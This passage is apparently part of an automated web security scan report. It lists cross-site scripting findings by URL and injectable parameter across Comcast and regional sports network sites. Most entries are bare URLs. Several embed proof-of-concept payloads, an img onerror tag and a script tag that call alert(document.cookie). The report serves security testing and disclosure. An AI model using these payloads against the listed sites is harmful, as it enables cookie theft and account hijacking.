2.172. http://www.comcast.net/slideshow/music-greenday [REST URL parameter 2]

2.173. http://www.comcast.net/slideshow/news-spacepictures [REST URL parameter 2]

2.174. http://www.comcast.net/slideshow/sports-bestdressedathletes/ [REST URL parameter 2]

2.175. http://www.comcast.net/weather/19103/ [REST URL parameter 2]

2.176. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a [REST URL parameter 2]

2.177. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ [REST URL parameter 2]

2.178. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 1]

2.179. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 2]

2.180. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 3]

2.181. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 4]

2.182. http://www.comcastsportsnet.com/common/js/aggregate.js [REST URL parameter 3]

2.183. http://www.comcastsportsnet.com/pages/main [REST URL parameter 1]

2.184. http://www.comcastsportsnet.com/pages/main [REST URL parameter 2]

2.185. http://www.csnbaltimore.com/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html [REST URL parameter 5]

2.186. http://www.csnbaltimore.com/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html [REST URL parameter 5]

2.187. http://www.csnbaltimore.com/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html [REST URL parameter 5]

2.188. http://www.csnbaltimore.com/12/12/10/Ravens-Texans-The-basics/landing.html [REST URL parameter 5]

2.189. http://www.csnbaltimore.com/12/16/10/Franklin-finally-heads-to-Vandy/landing.html [REST URL parameter 5]

2.190. http://www.csnbaltimore.com/12/16/10/New-sports-arena-for-Baltimore-/landing.html [REST URL parameter 5]

2.191. http://www.csnbaltimore.com/12/16/10/Will-Ravens-respond-to-Saints/landing.html [REST URL parameter 5]

2.192. http://www.csnbaltimore.com/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html [REST URL parameter 5]

2.193. http://www.csnbaltimore.com/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html [REST URL parameter 5]

2.194. http://www.csnbaltimore.com/12/17/10/Eisenberg-Saints-test-jazzes-Ravens/landing.html [REST URL parameter 5]

2.195. http://www.csnbaltimore.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.196. http://www.csnbaltimore.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.197. http://www.csnbaltimore.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.198. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 1]

2.199. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 2]

2.200. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 3]

2.201. http://www.csnbaltimore.com/common/global_flash/player/player.php [REST URL parameter 4]

2.202. http://www.csnbaltimore.com/common/js/aggregate.js [REST URL parameter 3]

2.203. http://www.csnbaltimore.com/favicon.ico [REST URL parameter 1]

2.204. http://www.csnbaltimore.com/pages/landing [REST URL parameter 1]

2.205. http://www.csnbaltimore.com/pages/landing [REST URL parameter 2]

2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]

2.207. http://www.csnbaltimore.com/pages/main [REST URL parameter 1]

2.208. http://www.csnbaltimore.com/pages/main [REST URL parameter 2]

2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]

2.210. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 1]

2.211. http://www.csnbaltimore.com/pages/profiles [REST URL parameter 2]

2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.213. http://www.csnbaltimore.com/pages/video [REST URL parameter 1]

2.214. http://www.csnbaltimore.com/pages/video [REST URL parameter 2]

2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]

2.216. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 1]

2.217. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 2]

2.218. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 3]

2.219. http://www.csnbayarea.com/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html [REST URL parameter 4]

2.220. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

2.221. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

2.222. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

2.223. http://www.csnbayarea.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

2.224. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

2.225. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

2.226. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

2.227. http://www.csnbayarea.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

2.228. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

2.229. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

2.230. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

2.231. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

2.232. http://www.csnbayarea.com/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 5]

2.233. http://www.csnbayarea.com/pages/landing [name of an arbitrarily supplied request parameter]

2.234. http://www.csnbayarea.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.235. http://www.csnbayarea.com/pages/video [name of an arbitrarily supplied request parameter]

2.236. http://www.csncalifornia.com/ [name of an arbitrarily supplied request parameter]

2.237. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 1]

2.238. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 2]

2.239. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 3]

2.240. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [REST URL parameter 4]

2.241. http://www.csncalifornia.com/11/22/10/Enter-to-win-FREE-Kings-Tickets-or-a-FRE/landing.html [name of an arbitrarily supplied request parameter]

2.242. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 1]

2.243. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 2]

2.244. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 3]

2.245. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 4]

2.246. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [name of an arbitrarily supplied request parameter]

2.247. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 1]

2.248. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 2]

2.249. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 3]

2.250. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 4]

2.251. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 1]

2.252. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 2]

2.253. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 3]

2.254. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 4]

2.255. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [name of an arbitrarily supplied request parameter]

2.256. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 1]

2.257. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 2]

2.258. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 3]

2.259. http://www.csncalifornia.com/12/16/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_maiocco_v3.html [REST URL parameter 4]

2.260. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 1]

2.261. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 2]

2.262. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 3]

2.263. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [REST URL parameter 4]

2.264. http://www.csncalifornia.com/12/17/10/As-claim-RHP-Humber-off-waivers-from-Roy/landing_athletics.html [name of an arbitrarily supplied request parameter]

2.265. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 1]

2.266. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 2]

2.267. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 3]

2.268. http://www.csncalifornia.com/12/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html [REST URL parameter 4]

2.269. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 1]

2.270. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 2]

2.271. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 3]

2.272. http://www.csncalifornia.com/12/17/10/Steinmetz-NBA-Power-Rankings-121710/landing_steinmetz_v3.html [REST URL parameter 4]

2.273. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 1]

2.274. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 2]

2.275. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 3]

2.276. http://www.csncalifornia.com/12/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html [REST URL parameter 4]

2.277. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 1]

2.278. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 2]

2.279. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 3]

2.280. http://www.csncalifornia.com/12/17/10/bRaiders-Notes-and-Notables-bRaiders-to-/landing_notes_notables.html [REST URL parameter 4]

2.281. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 1]

2.282. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 2]

2.283. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 3]

2.284. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [REST URL parameter 4]

2.285. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_kings.html [name of an arbitrarily supplied request parameter]

2.286. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 1]

2.287. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 2]

2.288. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 3]

2.289. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 4]

2.290. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [name of an arbitrarily supplied request parameter]

2.291. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 1]

2.292. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 2]

2.293. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 3]

2.294. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 4]

2.295. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 1]

2.296. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 2]

2.297. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 3]

2.298. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 4]

2.299. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [name of an arbitrarily supplied request parameter]

2.300. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 1]

2.301. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 2]

2.302. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 3]

2.303. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 4]

2.304. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [name of an arbitrarily supplied request parameter]

2.305. http://www.csncalifornia.com/pages/profiles [name of an arbitrarily supplied request parameter]

2.306. http://www.csncalifornia.com/pages/video [name of an arbitrarily supplied request parameter]

2.307. http://www.csnchicago.com/12/12/10/Blackhawks-Bowman-opens-up-to-CSNs-Boden/landing.html [REST URL parameter 5]

2.308. http://www.csnchicago.com/12/15/10/Noah-needs-surgery-could-miss-10-weeks/landing_bulls.html [REST URL parameter 5]

2.309. http://www.csnchicago.com/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html [REST URL parameter 5]

2.310. http://www.csnchicago.com/12/16/10/bHawks-911bbrKane-Hossa-etc-Hawks-using-/landing.html [REST URL parameter 5]

2.311. http://www.csnchicago.com/12/17/10/Bears-to-practice-at-Northwestern-to-pre/landing_insider_john_moon_mullin.html [REST URL parameter 5]

2.312. http://www.csnchicago.com/12/17/10/Bears-to-practice-at-Nortwestern-to-prep/landing_insider_john_moon_mullin.html [REST URL parameter 5]

2.313. http://www.csnchicago.com/12/17/10/Greinke-Can-Block-Trade-to-15-Teams/landing_word_baseball.html [REST URL parameter 5]

2.314. http://www.csnchicago.com/12/17/10/Hawks-honor-Chris-Chelios-on-heritage-ni/landing_insider_tracey_myers.html [REST URL parameter 5]

2.315. http://www.csnchicago.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.316. http://www.csnchicago.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.317. http://www.csnchicago.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.318. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 1]

2.319. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 2]

2.320. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 3]

2.321. http://www.csnchicago.com/common/global_flash/player/player.php [REST URL parameter 4]

2.322. http://www.csnchicago.com/common/js/aggregate.js [REST URL parameter 3]

2.323. http://www.csnchicago.com/pages/video [REST URL parameter 1]

2.324. http://www.csnchicago.com/pages/video [REST URL parameter 2]

2.325. http://www.csnchicago.com/pages/video [name of an arbitrarily supplied request parameter]

2.326. http://www.csnne.com/12/16/10/Mom-Theyre-picking-on-Curran/v1_landing.html [REST URL parameter 5]

2.327. http://www.csnne.com/12/16/10/NFL-Picks-Week-15/landing_insider_levine.html [REST URL parameter 5]

2.328. http://www.csnne.com/12/16/10/Patriots-dont-let-injuries-stop-them/landing_patriots.html [REST URL parameter 5]

2.329. http://www.csnne.com/12/16/10/Same-old-same-old/landing_heyfelger.html [REST URL parameter 5]

2.330. http://www.csnne.com/12/16/10/The-un-firing-of-Brian-Cashman/v1_landing.html [REST URL parameter 5]

2.331. http://www.csnne.com/12/17/10/Antoine-Walkers-not-a-Maine-man/landing_insider_levine.html [REST URL parameter 5]

2.332. http://www.csnne.com/12/17/10/Give-it-a-rest-Rajon/landing_wakeup.html [REST URL parameter 5]

2.333. http://www.csnne.com/12/17/10/Jenks-ex-coach-thinks-hell-shine-with-Re/landing_redsox.html [REST URL parameter 5]

2.334. http://www.csnne.com/12/17/10/Minnesota-collapse-Its-all-Favres-fault-/landing_wgs.html [REST URL parameter 5]

2.335. http://www.csnne.com/12/17/10/Robinson-at-point-guard-will-be-a-learni/landing_celtics.html [REST URL parameter 5]

2.336. http://www.csnne.com/12/17/10/Woodhead-incognito-on-sales-floor/landing_wgs.html [REST URL parameter 5]

2.337. http://www.csnne.com/12/18/10/Another-day-another-injured-Celtic/landing.html [REST URL parameter 5]

2.338. http://www.csnne.com/12/18/10/Bradley-ready-for-his-turn-with-Celtics/landing_celtics.html [REST URL parameter 5]

2.339. http://www.csnne.com/12/18/10/Bruins-hold-on-to-defeat-Capitals-3-2/v1_landing_bruins.html [REST URL parameter 5]

2.340. http://www.csnne.com/12/18/10/Confirmed-Red-Sox-sign-Dan-Wheeler/landing_redsox.html [REST URL parameter 5]

2.341. http://www.csnne.com/12/18/10/Felgers-Four-Keys-to-the-game/insider_felger.html [REST URL parameter 5]

2.342. http://www.csnne.com/12/18/10/NE-college-basketball-results-Saturday-D/landing.html [REST URL parameter 5]

2.343. http://www.csnne.com/12/18/10/NE-college-hockey-results-Saturday-Decem/landing.html [REST URL parameter 5]

2.344. http://www.csnne.com/12/18/10/Not-feeling-himself-Thomas-saves-day-for/v1_landing_bruins.html [REST URL parameter 5]

2.345. http://www.csnne.com/12/18/10/Not-feeling-himself-Thomas-saves-the-day/v1_landing_bruins.html [REST URL parameter 5]

2.346. http://www.csnne.com/12/18/10/ONeals-Christmas-wish-To-play-before-the/landing_celtics.html [REST URL parameter 5]

2.347. http://www.csnne.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.348. http://www.csnne.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.349. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 1]

2.350. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 2]

2.351. http://www.csnne.com/common/FB/xd_receiver.htm [REST URL parameter 3]

2.352. http://www.csnne.com/common/ad_count.php [REST URL parameter 1]

2.353. http://www.csnne.com/common/ad_count.php [REST URL parameter 2]

2.354. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 1]

2.355. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 2]

2.356. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 3]

2.357. http://www.csnne.com/common/global_flash/player/player.php [REST URL parameter 4]

2.358. http://www.csnne.com/common/js/aggregate.js [REST URL parameter 3]

2.359. http://www.csnne.com/pages/coldhardfootballfacts [REST URL parameter 1]

2.360. http://www.csnne.com/pages/coldhardfootballfacts [REST URL parameter 2]

2.361. http://www.csnne.com/pages/coldhardfootballfacts [name of an arbitrarily supplied request parameter]

2.362. http://www.csnne.com/pages/v3_sportsnetcentralupdate [REST URL parameter 1]

2.363. http://www.csnne.com/pages/v3_sportsnetcentralupdate [REST URL parameter 2]

2.364. http://www.csnne.com/pages/v3_sportsnetcentralupdate [name of an arbitrarily supplied request parameter]

2.365. http://www.csnne.com/pages/v3_video [REST URL parameter 1]

2.366. http://www.csnne.com/pages/v3_video [REST URL parameter 2]

2.367. http://www.csnne.com/pages/v3_video [name of an arbitrarily supplied request parameter]

2.368. http://www.csnne.com/pages/video [REST URL parameter 1]

2.369. http://www.csnne.com/pages/video [REST URL parameter 2]

2.370. http://www.csnne.com/pages/video [name of an arbitrarily supplied request parameter]

2.371. http://www.csnnw.com/common/ad_count.php [REST URL parameter 1]

2.372. http://www.csnnw.com/common/ad_count.php [REST URL parameter 2]

2.373. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 1]

2.374. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 2]

2.375. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 3]

2.376. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 1]

2.377. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 2]

2.378. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 3]

2.379. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 4]

2.380. http://www.csnnw.com/common/js/aggregate.js [REST URL parameter 3]

2.381. http://www.csnnw.com/favicon.ico [REST URL parameter 1]

2.382. http://www.csnnw.com/pages/landing2 [REST URL parameter 1]

2.383. http://www.csnnw.com/pages/landing2 [REST URL parameter 2]

2.384. http://www.csnnw.com/pages/landing2 [name of an arbitrarily supplied request parameter]

2.385. http://www.csnnw.com/pages/main [REST URL parameter 1]

2.386. http://www.csnnw.com/pages/main [REST URL parameter 2]

2.387. http://www.csnnw.com/pages/main [name of an arbitrarily supplied request parameter]

2.388. http://www.csnphilly.com/pages/pieceoftheaction [name of an arbitrarily supplied request parameter]

2.389. http://www.csnphilly.com/pages/video [name of an arbitrarily supplied request parameter]

2.390. http://www.csnwashington.com/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.html [REST URL parameter 5]

2.391. http://www.csnwashington.com/12/17/10/Caps-Green-Were-going-to-be-alright/landing.html [REST URL parameter 5]

2.392. http://www.csnwashington.com/12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html [REST URL parameter 5]

2.393. http://www.csnwashington.com/12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html [REST URL parameter 5]

2.394. http://www.csnwashington.com/12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.html [REST URL parameter 5]

2.395. http://www.csnwashington.com/12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html [REST URL parameter 5]

2.396. http://www.csnwashington.com/12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html [REST URL parameter 5]

2.397. http://www.csnwashington.com/12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html [REST URL parameter 5]

2.398. http://www.csnwashington.com/12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html [REST URL parameter 5]

2.399. http://www.csnwashington.com/12/18/10/Beninati-Fault-in-first/landing_joeb.html [REST URL parameter 5]

2.400. http://www.csnwashington.com/12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html [REST URL parameter 5]

2.401. http://www.csnwashington.com/12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html [REST URL parameter 5]

2.402. http://www.csnwashington.com/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.html [REST URL parameter 5]

2.403. http://www.csnwashington.com/12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html [REST URL parameter 5]

2.404. http://www.csnwashington.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 5]

2.405. http://www.csnwashington.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 5]

2.406. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 1]

2.407. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 2]

2.408. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 3]

2.409. http://www.csnwashington.com/common/global_flash/player/player.php [REST URL parameter 4]

2.410. http://www.csnwashington.com/common/js/aggregate.js [REST URL parameter 3]

2.411. http://www.csnwashington.com/favicon.ico [REST URL parameter 1]

2.412. http://www.csnwashington.com/pages/photos [REST URL parameter 1]

2.413. http://www.csnwashington.com/pages/photos [REST URL parameter 2]

2.414. http://www.csnwashington.com/pages/photos [name of an arbitrarily supplied request parameter]

2.415. http://www.csnwashington.com/pages/video [REST URL parameter 1]

2.416. http://www.csnwashington.com/pages/video [REST URL parameter 2]

2.417. http://www.csnwashington.com/pages/video [name of an arbitrarily supplied request parameter]

2.418. http://www.csnwashington.com/pages/videoembed [REST URL parameter 1]

2.419. http://www.csnwashington.com/pages/videoembed [REST URL parameter 2]

2.420. http://www.csnwashington.com/pages/videoembed [name of an arbitrarily supplied request parameter]

2.421. http://www.csssports.com/common/ad_count.php [REST URL parameter 1]

2.422. http://www.csssports.com/common/ad_count.php [REST URL parameter 2]

2.423. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 1]

2.424. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 2]

2.425. http://www.csssports.com/common/dynrss/dynrss_3242_landing_.rss [REST URL parameter 3]

2.426. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 1]

2.427. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 2]

2.428. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 3]

2.429. http://www.csssports.com/common/global_flash/player/player.php [REST URL parameter 4]

2.430. http://www.csssports.com/common/js/aggregate.js [REST URL parameter 3]

2.431. http://www.csssports.com/pages/landing/ [REST URL parameter 1]

2.432. http://www.csssports.com/pages/landing/ [REST URL parameter 2]

2.433. http://www.csssports.com/pages/landing/ [name of an arbitrarily supplied request parameter]

2.434. http://www.csssports.com/pages/landing_09 [REST URL parameter 1]

2.435. http://www.csssports.com/pages/landing_09 [REST URL parameter 2]

2.436. http://www.csssports.com/pages/landing_09 [name of an arbitrarily supplied request parameter]

2.437. http://www.csssports.com/pages/main [REST URL parameter 1]

2.438. http://www.csssports.com/pages/main [REST URL parameter 2]

2.439. http://www.csssports.com/pages/main [name of an arbitrarily supplied request parameter]

2.440. http://www.dailycandy.com/atlanta/article/94262/5-Gifts-for-Homebodies [REST URL parameter 4]

2.441. http://www.dailycandy.com/dallas/article/94178/Artsy-Gifts-Shopping-at-Nest [REST URL parameter 4]

2.442. http://www.dailycandy.com/los-angeles/article/94180/Los-Angeles-Events-and-Diversions [REST URL parameter 4]

2.443. http://www.dailycandy.com/new-york/article/94172/Custom-Family-Crests [REST URL parameter 4]

2.444. http://www.dailycandy.com/washington-dc/article/94234/5-Gifts-for-Art-Fanatics [REST URL parameter 4]

2.445. http://www.exercisetv.tv/workout-videos/all/ [REST URL parameter 2]

2.446. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [REST URL parameter 3]

